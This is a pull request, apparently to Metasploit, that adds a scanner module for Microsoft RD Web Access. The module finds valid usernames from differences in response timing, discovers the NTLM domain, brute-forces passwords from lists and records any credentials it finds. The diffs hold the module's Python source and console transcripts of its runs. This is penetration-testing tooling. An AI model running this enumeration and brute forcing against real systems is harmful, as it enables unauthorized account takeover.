### PR TITLE
RDP Web Login User Enumeration Auxiliary Module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
+++ b/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
@@ -4,6 +4,7 @@ The Microsoft RD Web login is vulnerable to the same type of authentication user
 that is present for OWA. By analyzing the time it takes for a failed response, the RDWeb interface can be used
 to quickly test the validity of a set of usernames. The module additionally supports testing username password
 combinations. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
+This module also reports credentials to the credentials database when they are discovered.
 
 ## Verification Steps
 
@@ -35,6 +36,14 @@ Either a specific username to verify or a file with one username per line to ver
 
 Either a specific password to attempt or a file with one password per line to verify.
 If not provided, uses the same None password for all requests
+
+### verify_service
+
+Whether or not to verify that RDWeb is installed prior to scanning. Defaults to true.
+
+### user_agent
+
+An alternate User Agent string to use in HTTP requests. Defaults to Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0.
 
 ## Scenarios
 If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
@@ -79,4 +88,7 @@ msf6 auxiliary(scanner/http/rdp_web_login) > run
 [*] Auxiliary module execution completed```
 
 ## Version and OS
-Tested against Microsoft IIS 10.0 and RDWeb on Windows Server 2019
+Tested against Microsoft IIS 10.0 and RDWeb on Windows Server 2019 and Windows Server 2016
+
+## References
+- https://raxis.com/blog/rd-web-access-vulnerability

--- a/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
+++ b/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
@@ -30,8 +30,6 @@ Either a specific username to verify or a file with one username per line to ver
 ## Scenarios
 If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
 
-### Version and OS
-
 Specific target output replaced with Ys so as not to disclose information
 ```msf6 > use auxiliary/scanner/http/rdp_web_login
 msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
@@ -47,3 +45,6 @@ msf6 auxiliary(scanner/http/rdp_web_login) > run
 [-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed```
+
+## Version and OS
+Tested against Microsoft IIS 10.0 and RDWeb 2019

--- a/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
+++ b/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
@@ -1,0 +1,49 @@
+## Vulnerable Application
+
+The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability that is present for OWA (see owa scanner modules). By analyzing the time it takes for a failed response, the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
+
+## Verification Steps
+
+
+- [ ] Start `msfconsole`
+- [ ] `use auxiliary/scanner/http/rdp_web_login`
+- [ ] `set rhost TARGET_IP`
+- [ ] `set username USER_OR_FILE`
+- [ ] `set domain DOMAIN` (Only if you don't want to test the domain discovery feature)
+- [ ] Check output for validity of your test username(s)/domain
+
+
+## Options
+
+### domain
+
+The target domain to use for the username checks. If not provided, enum_domain needs to be set to true so it can be discovered.
+
+### enum_domain
+
+Enumerate the domain by using an NTLM challenge/response and parsing the AD Domain out.
+
+### username
+
+Either a specific username to verify or a file with one username per line to verify.
+
+## Scenarios
+If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
+
+### Version and OS
+
+Specific target output replaced with Ys so as not to disclose information
+```msf6 > use auxiliary/scanner/http/rdp_web_login
+msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
+username => /home/kali/users.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
+RHOSTS => YY.YYY.YYY.YY
+msf6 auxiliary(scanner/http/rdp_web_login) > run
+
+[*] Running for YY.YYY.YYY.YY...
+[+] Found Domain: YYYYYYYYYYYY
+[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
+[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
+[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed```

--- a/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
+++ b/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
 The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability
-that is present for OWA. By analyzing the time it takes for a failed response,
-the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally,
-this module can attempt to discover the target NTLM domain if you don't already know it.
+that is present for OWA. By analyzing the time it takes for a failed response, the RDWeb interface can be used
+to quickly test the validity of a set of usernames. The module additionally supports testing username password
+combinations. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
 
 ## Verification Steps
 
@@ -12,8 +12,9 @@ this module can attempt to discover the target NTLM domain if you don't already 
 - [ ] `use auxiliary/scanner/http/rdp_web_login`
 - [ ] `set rhost TARGET_IP`
 - [ ] `set username USER_OR_FILE`
+- [ ] `set password PASSWORD_OR_FILE` (Only if you want to test the password brute forcing)
 - [ ] `set domain DOMAIN` (Only if you don't want to test the domain discovery feature)
-- [ ] Check output for validity of your test username(s)/domain
+- [ ] Check output for validity of your test username(s), password(s), and domain
 
 
 ## Options
@@ -29,6 +30,11 @@ Enumerate the domain by using an NTLM challenge/response and parsing the AD Doma
 ### username
 
 Either a specific username to verify or a file with one username per line to verify.
+
+### password
+
+Either a specific password to attempt or a file with one password per line to verify.
+If not provided, uses the same None password for all requests
 
 ## Scenarios
 If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
@@ -49,5 +55,28 @@ msf6 auxiliary(scanner/http/rdp_web_login) > run
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed```
 
+If an RDWeb login page is discovered, you can use this module to perform a brute force attack.
+```msf6 > use auxiliary/scanner/http/rdp_web_login
+msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS 192.168.148.128
+RHOSTS => 192.168.148.128
+msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
+username => /home/kali/users.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set password /home/kali/passwords.txt
+password => /home/kali/passwords.txt
+msf6 auxiliary(scanner/http/rdp_web_login) > set timeout 500
+timeout => 500
+msf6 auxiliary(scanner/http/rdp_web_login) > run
+
+[*] Running for YY.YYY.YYY.YY...
+[+] Found Domain: YYYY
+[-] Login YYYY\wrong:password is invalid! No response received in 500 milliseconds
+[-] Login YYYY\wrong:Password1! is invalid! No response received in 500 milliseconds
+[+] Password password is invalid but YYYY\k0pak4 is valid! Response received in 155.648 milliseconds
+[+] Login YYYY\k0pak4:Password1! is valid!
+[+] Password password is invalid but YYYY\Administrator is valid! Response received in 77.852 milliseconds
+[+] Password Password1! is invalid but YYYY\Administrator is valid! Response received in 76.029 milliseconds
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed```
+
 ## Version and OS
-Tested against Microsoft IIS 10.0 and RDWeb 2019
+Tested against Microsoft IIS 10.0 and RDWeb on Windows Server 2019

--- a/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
+++ b/documentation/modules/auxiliary/scanner/http/rdp_web_login.md
@@ -1,6 +1,9 @@
 ## Vulnerable Application
 
-The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability that is present for OWA (see owa scanner modules). By analyzing the time it takes for a failed response, the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
+The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability
+that is present for OWA. By analyzing the time it takes for a failed response,
+the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally,
+this module can attempt to discover the target NTLM domain if you don't already know it.
 
 ## Verification Steps
 

--- a/lib/metasploit/framework/credential.rb
+++ b/lib/metasploit/framework/credential.rb
@@ -36,7 +36,7 @@ module Metasploit
       # @!attribute realm
       #   @return [String,nil] The realm credential component (e.g domain name)
       attr_accessor :realm
-      # @!attribute realm
+      # @!attribute realm_key
       #   @return [String,nil] The type of {#realm}
       attr_accessor :realm_key
 

--- a/lib/msf/core/module/external.rb
+++ b/lib/msf/core/module/external.rb
@@ -104,6 +104,12 @@ module Msf::Module::External
 
       cred[:private_type] = :password
 
+      # Optional
+      if data.has_key?('domain')
+        cred[:service_data][:realm_value] = data['domain']
+        cred[:service_data][:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+      end
+
       store_valid_credential(**cred)
     when 'wrong_password'
       # Required
@@ -140,7 +146,6 @@ def handle_credential_login(data, mod)
       module_fullname: self.fullname,
       workspace_id: myworkspace_id
   }
-
   # Optional
   credential_data = {
       origin_type: :service,
@@ -152,9 +157,9 @@ def handle_credential_login(data, mod)
     credential_data[:private_type] = :password
   end
 
-  if data.has_key?(:domain)
-    credential_data[:public_data] = data['domain']
-    credential_data[:public_type] = :realm
+  if data.has_key?('domain')
+    credential_data[:realm_value] = data['domain']
+    credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
   end
 
   login_data = {

--- a/lib/msf/core/module/external.rb
+++ b/lib/msf/core/module/external.rb
@@ -152,6 +152,11 @@ def handle_credential_login(data, mod)
     credential_data[:private_type] = :password
   end
 
+  if data.has_key?(:domain)
+    credential_data[:public_data] = data['domain']
+    credential_data[:public_type] = :realm
+  end
+
   login_data = {
       core: create_credential(credential_data),
       last_attempted_at: DateTime.now,

--- a/lib/msf/core/modules/external/python/metasploit/module.py
+++ b/lib/msf/core/modules/external/python/metasploit/module.py
@@ -69,6 +69,12 @@ def report_vuln(ip, name, **opts):
     report('vuln', vuln)
 
 
+def report_valid_username(username, **opts):
+    info = opts.copy()
+    info.update({'username': username})
+    report('credential_login', info)
+
+
 def report_correct_password(username, password, **opts):
     info = opts.copy()
     info.update({'username': username, 'password': password})

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -68,15 +68,14 @@ def verify_service(rhost, rport, targeturi, timeout, user_agent):
     url = f'https://{rhost}:{rport}/{targeturi}'
     headers = {'Host':rhost,
                'User-Agent': user_agent}
-    session = requests.Session()
     try:
         request = requests.get(url, headers=headers, timeout=(timeout / 1000),
                                verify=False, allow_redirects=False)
         return request.status_code == 200 and 'RDWeb' in request.text
     except requests.exceptions.Timeout:
         return False
-    except Exception as e:
-        module.log(str(e), level='error')
+    except Exception as exc:
+        module.log(str(exc), level='error')
         return False
 
 

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -29,7 +29,7 @@ metadata = {
     'date': '2020-12-23',
     'license': 'MSF_LICENSE',
     'references': [
-        {'type': 'url', 'ref': 'REPLACE ME'},
+        {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
     ],
     'type': 'single_scanner',
     'options': {

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -70,7 +70,8 @@ def verify_service(rhost, rport, targeturi, timeout, user_agent):
                'User-Agent': user_agent}
     session = requests.Session()
     try:
-        request = requests.get(url, headers=headers, timeout=(timeout / 1000))
+        request = requests.get(url, headers=headers, timeout=(timeout / 1000),
+                               verify=False, allow_redirects=False)
         return request.status_code == 200 and 'RDWeb' in request.text
     except requests.exceptions.Timeout:
         return False

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -19,8 +19,9 @@ except ImportError:
 metadata = {
     'name': 'Microsoft RDP Web Client Login Enumeration',
     'description': '''
-        Enumerate valid usernames against a Microsoft RDP Web Client
-        by performing a timing based check against the provided username.
+        Enumerate valid usernames and passwords against a Microsoft RDP Web Client
+        by attempting authentication and performing a timing based check
+        against the provided username.
     ''',
     'authors': [
         'Matthew Dunn'
@@ -113,12 +114,12 @@ def check_login(rhost, rport, targeturi, domain, username, password, timeout):
 
 
 def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout):
-    """Check each login combination"""
+    """Check each username and password combination"""
     for (username, password) in list(itertools.product(usernames, passwords)):
         check_login(rhost, rport, targeturi, domain, username.strip(), password.strip(), timeout)
 
 def run(args):
-    """Run the module, gathering the domain if desired and verifying usernames"""
+    """Run the module, gathering the domain if desired and verifying usernames and passwords"""
     module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
     if DEPENDENCIES_MISSING:
         module.log('Module dependencies are missing, cannot continue', level='error')
@@ -141,12 +142,13 @@ def run(args):
             usernames = file_contents.readlines()
     else:
         usernames = [args['username']]
-    if os.path.isfile(args['password']):
+    if 'password' in args and os.path.isfile(args['password']):
         with open(args['password'], 'r') as file_contents:
             passwords = file_contents.readlines()
-    else:
+    elif 'password' in args:
         passwords = [args['password']]
-
+    else:
+        passwords =['wrong']
     # Check each valid login combination
     check_logins(args['RHOSTS'], args['rport'], args['targeturi'],
                    domain, usernames, passwords, int(args['timeout']))

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -1,0 +1,75 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+from metasploit import module
+
+# extra modules
+dependencies_missing = False
+try:
+    import requests
+except ImportError:
+    dependencies_missing = True
+
+
+# Metasploit Metadata
+metadata = {
+    'name': 'Microsoft RDP Web Client Login Enumeration',
+    'description': '''
+        Enumerate valid usernames against a Microsoft RDP Web Client by performing a timing based check against the provided username.
+    ''',
+    'authors': [
+        'Matthew Dunn'
+    ],
+    'date': '2020-12-23',
+    'license': 'MIT',
+    'references': [
+        {'type': 'url', 'ref': 'REPLACE ME'},
+    ],
+    'type': 'single_scanner',
+    'options': {
+        'targeturi': {'type': 'string', 'description': 'The base path to the RDP Web Client install',
+                      'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
+        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True, 'default': None},
+        'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': 443},
+        'domain': {'type': 'string', 'description': 'The target AD domain', 'required': True, 'default': None},
+        'cutoff_time': {'type': 'number',
+                        'description': 'Minimum milliseconds for response to consider username invalid',
+                        'required': True, 'default': 1000}
+    }
+}
+
+
+def check_username(rhost, rport, targeturi, domain, username, cutoff_time):
+    """Check a single username against the RDWeb Client
+    The cutoff_time is used to specify the amount of milliseconds where a
+    response should consider the username invalid."""
+
+    url = f'https://{rhost}:{rport}/{targeturi}'
+    body = f'DomainUserName={domain}%5C{username}&UserPass=incorrect' 
+    session = requests.Session()
+    try:
+        request = session.post(url, data=body, timeout=cutoff_time)
+        if request.status_code == 200:
+            module.log(f'Username {domain}\{username} is valid! Response received in {request.elapsed} milliseconds',
+                       level='good')
+        else:
+            module.log(f'Username {domain}\{username} is invalid! No response received in {cutoff_time} milliseconds',
+                       level='error')
+    except requests.exceptions.RequestException as e:
+        module.log('{}'.format(e), level='error')
+        return
+
+
+def run(args):
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
+    if dependencies_missing:
+        logging.error('Module dependency (requests) is missing, cannot continue')
+        return
+
+    check_username(args['rhost'], args['rport'], args['targeturi'],
+                   args['domain'], args['username'], args['cutoff_time'])
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -103,7 +103,7 @@ def check_usernames(rhost, rport, targeturi, domain, username_file, timeout):
 def run(args):
     module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
     if dependencies_missing:
-        module.log('Module dependency (requests) is missing, cannot continue', level='error')
+        module.log('Module dependencies are missing, cannot continue', level='error')
         return
 
     # Gather AD Domain either from args or enumeration

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -32,7 +32,6 @@ metadata = {
     'options': {
         'targeturi': {'type': 'string', 'description': 'The base path to the RDP Web Client install',
                       'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
-        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True, 'default': None},
         'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': 443},
         'domain': {'type': 'string', 'description': 'The target AD domain', 'required': False, 'default': None},
         'username': {'type': 'string', 'description': 'The username to verify or path to a file of usernames',
@@ -121,10 +120,10 @@ def run(args):
 
     # Check the provided username or file of usernames
     if os.path.isfile(args['username']):
-        check_usernames(args['rhost'], args['rport'], args['targeturi'],
+        check_usernames(args['RHOSTS'], args['rport'], args['targeturi'],
                    domain, args['username'], int(args['timeout']))
     else:
-        check_username(args['rhost'], args['rport'], args['targeturi'],
+        check_username(args['RHOSTS'], args['rport'], args['targeturi'],
                        domain, args['username'], int(args['timeout']))
 
 

--- a/modules/auxiliary/scanner/http/rdp_web_login.py
+++ b/modules/auxiliary/scanner/http/rdp_web_login.py
@@ -82,12 +82,14 @@ def check_username(rhost, rport, targeturi, domain, username, timeout):
                'Content-Length': '53',
                'Origin': 'https://{rhost}'}
     session = requests.Session()
+    report_data = {'domain':domain, 'address': rhost, 'port': rport, 'protocol': 'tcp', 'service_name':'RDWeb'} 
     try:
         request = session.post(url, data=body, headers=headers,
                                timeout=(timeout / 1000), verify=False)
         if request.status_code == 200:
             module.log(f'Username {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
                        level='good')
+            module.report_valid_username(username, **report_data)
     except requests.exceptions.Timeout:
         module.log(f'Username {domain}\\{username} is invalid! No response received in {timeout} milliseconds',
                    level='error')


### PR DESCRIPTION
The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability that is present for OWA (see owa scanner modules). By analyzing the time it takes for a failed response, the RDWeb interface can be used to quickly test the validity of a set of usernames. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/http/rdp_web_login`
- [x] `set rhost TARGET_IP`
- [x] `set username USER_OR_FILE`
- [x] `set domain DOMAIN` (Only if you don't want to test the domain discovery feature)
- [x] run
- [x] Check output for validity of your test username(s)/domain


## Scenarios
Specific target output replaced with Ys so as not to disclose information
```msf6 > use auxiliary/scanner/http/rdp_web_login
msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
username => /home/kali/users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
RHOSTS => YY.YYY.YYY.YY
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for YY.YYY.YYY.YY...
[+] Found Domain: YYYYYYYYYYYY
[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Version and OS
Tested against Microsoft IIS 10.0 and RDWeb 2019